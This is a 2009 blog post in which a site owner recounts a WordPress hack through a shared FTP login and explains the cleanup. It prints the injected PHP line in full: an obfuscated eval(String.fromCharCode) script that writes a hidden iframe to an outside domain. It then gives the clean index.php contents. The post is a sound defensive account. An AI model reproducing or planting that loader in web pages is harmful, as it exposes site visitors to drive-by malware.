Wednesday, March 10, 2010


My WordPress Got Hacked

by mf on June 6, 2009

So I discovered today that some of my WordPress sites had been hacked. Avast, my anti-virus software, was alerting that the sites carried a virus in the form of an iframe. All of the affected sites shared the same FTP login, which I changed as soon as I realized. I’ve fixed the problem here and am now off to fix the other sites. Two files were tampered with: index.php in the root of your domain, and index.php inside wp-content.

It’s a line of PHP that echoes an obfuscated JavaScript string. The eval(String.fromCharCode(...)) call turns the list of character codes back into JavaScript at page load; decoded, it is a document.write call that inserts a 1x3 pixel iframe pointing at an external domain, which is what the anti-virus was picking up. The injected line reads:

<?php echo '<script type="text/javascript">eval(String.fromCharCode(102,117,110,99,116,105,
111,110,32,100,57,56,100,40,41,123,118,97,114,32,115,100,49,55,55,50,61,
49,50,51,43,51,50,52,59,125,118,97,114,32,103,104,103,52,53,61,34,115,
34,59,118,97,114,32,119,61,34,117,112,116,117,108,108,111,103,34,59,
118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,104,50,104,61,
34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,114,34,59,118,97,
114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,
46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115,114,
39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,
53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,
39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,
104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,
43,39,114,39,43,39,97,39,43,39,109,101,62,39,41,59,32,102,117,110,
99,116,105,111,110,32,102,57,57,102,40,41,123,118,97,114,32,115,55,
97,56,56,115,61,57,55,43,55,53,59,125,32,118,97,114,32,115,102,
55,115,61,49,50,51))</script>'; ?>

If you’re having this problem, first change your FTP password, WordPress passwords and anything else that could have been compromised.

FTP into your site and check the contents of the two files listed above to confirm they have indeed been infected. If so, open them in a text editor and delete the injected script. The entire index.php file in the root should read:

<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
?>

and the entire index.php file located in wp-content should just read:

<?php
// Silence is golden.
?>

Make the changes, upload the files back to the right spots, and the site should work again. If you have questions about this, feel free to leave a comment and I’ll be glad to help out. This is what fixed my site. It should work on yours if you have the same problem, but I can’t guarantee it.
